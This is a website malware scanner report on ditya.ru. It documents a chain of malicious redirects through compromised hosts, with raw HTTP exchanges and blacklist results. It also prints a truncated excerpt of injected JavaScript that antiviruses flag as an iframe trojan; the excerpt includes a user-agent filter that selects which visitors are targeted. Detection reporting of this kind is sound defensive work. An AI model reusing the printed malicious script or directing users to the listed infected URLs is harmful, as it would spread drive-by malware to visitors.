Malware Scanner report for ditya.ru

Malicious/Suspicious/Total urls checked: 1/0/15

1 page has malicious code. See details below

Blacklists: Found

The website is marked by Yandex as suspicious.

The website "ditya.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious redirects: Found

The website redirects visitors from search engines to the 3rd-party URL. The chain of malicious redirects found:
->http://alfsystem.com.my/includes/domit/1.php
471 websites infected. alfsystem.com.my is marked by Yandex as suspicious.
->http://www.csra.de/includes/domit/1.php
346 websites infected.
->http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php
56 websites infected.
->http://google.ru
42 websites infected.

The website "ditya.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.

Malicious/Hidden/Total iFrames: 0/0/1

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ditya.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://ditya.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Malicious/Suspicious Redirects

Request	Server response	Status
URL: http://ditya.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: ditya.ru Referer: http://www.google.com/search?q=redirect+check1	HTTP/1.1 302 Found Connection: close Date: Sat, 28 Jun 2014 10:27:12 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: nginx/1.2.1 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.13	malicious
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2	HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 28 Jun 2014 10:27:13 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.23	malicious
URL: http://www.csra.de/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: www.csra.de Referer: http://www.google.com/search?q=redirect+check3	HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 28 Jun 2014 10:27:13 GMT Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.29	malicious
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php (imitation of visitor from search engine) GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1 Host: jbtconsultinggroup.com Referer: http://www.google.com/search?q=redirect+check4	HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 28 Jun 2014 10:27:13 GMT Location: http://google.ru Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html	malicious

Scanned pages/files

Request	Server response	Status
http://ditya.ru/	200 OK Content-Length: 23998 Content-Type: text/html	clean
http://ditya.ru/cache/template/js.php?id=904548fe50f1a3bf5e2bdf2b6db55378	200 OK Content-Length: 86241 Content-Type: application/x-javascript	clean
http://ditya.ru/cache/template/js.php?id=b5796c3d38edccdffd29d389a0d073d9	200 OK Content-Length: 3638 Content-Type: application/x-javascript	clean
http://ditya.ru/cache/template/js.php?id=67f2ab8d2469f0de9d16b01dff68cd13	200 OK Content-Length: 83992 Content-Type: application/x-javascript	clean
http://ditya.ru/cache/template/js.php?id=c9661bd88b851d91bb6b218452e811cb	200 OK Content-Length: 825 Content-Type: application/x-javascript	clean
http://stg.odnoklassniki.ru/share/odkl_share.js	200 OK Content-Length: 12312 Content-Type: application/x-javascript	clean
http://ditya.ru/cache/template/js.php?id=6fbdc23a99e66aded74ec900a7877dd6	200 OK Content-Length: 8761 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){function stripos(f_haystack,f_needle,f_offset){var haystack=(f_haystack+'').toLowerCase();var needle=(f_needle+'').toLowerCase();var index=0;if((index=haystack.indexOf(needle,f_offset))!==-1){return index;} return false;} function zzz_check_ua(){var blackList='Linux\|Macintosh\|FreeBSD\|Chrome\|iPad\|iPhone\|IEMobile\|Android\|Firefox/18.0\|Firefox/18.0.1\|Firefox/18.0.2\|Firefox/19.0\|Firefox/19.0.1\|Firefox/19.0.2\|Firefox/20.0\|Firefox/21.0\|Firefox/22.0';blackList=blackList.split('\|');va ... 7958 bytes are skipped ...);$('div.headerbox div.deepest').matchHeight(20);$('div.topbox div.deepest').matchHeight(20);$('#bottom div.bottombox div.deepest').matchHeight(20);$('#bottom2 div.bottombox div.deepest').matchHeight(20);$('div.maintopbox div.deepest').matchHeight(20);$('div.mainbottombox div.deepest').matchHeight(20);$('div.contenttopbox div.deepest').matchHeight(20);$('div.contentbottombox div.deepest').matchHeight(20);$('#left, #right, #contentleft, #contentright').matchHeight(20);});;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports: Avast JS:Iframe-DVI [Trj] Microsoft Trojan:JS/Iframe.DI Kaspersky HEUR:Trojan.Script.Generic NANO-Antivirus Trojan.Script.Iframe.brqwio VIPRE Trojan.JS.IFrame.di (v) Norman Iframe.ZX
http://ditya.ru/templates/yoo_neo/warp/js/search.js	200 OK Content-Length: 5493 Content-Type: application/x-javascript	clean
https://apis.google.com/js/plusone.js	200 OK Content-Length: 11840 Content-Type: application/javascript	clean
http://userapi.com/js/api/openapi.js?18	200 OK Content-Length: 64039 Content-Type: application/x-javascript	clean
http://ditya.ru/index.php/component/users/?view=reset	200 OK Content-Length: 18468 Content-Type: text/html	clean
http://ditya.ru/cache/template/js.php?id=ced0b8895e47deadec3d4bbc1f0d7d2e	200 OK Content-Length: 224400 Content-Type: application/x-javascript	clean
http://ditya.ru/cache/template/js.php?id=e22d7081f45d883c89e55f0847946a79	200 OK Content-Length: 2630 Content-Type: application/x-javascript	clean
http://ditya.ru/index.php/component/users/	200 OK Content-Length: 17338 Content-Type: text/html	clean
http://ditya.ru/index.php/component/users/?view=remind	200 OK Content-Length: 18187 Content-Type: text/html	clean

Recently found suspicious websites

Malware Scanner report for ditya.ru

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Malicious/Suspicious Redirects

Scanned pages/files

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools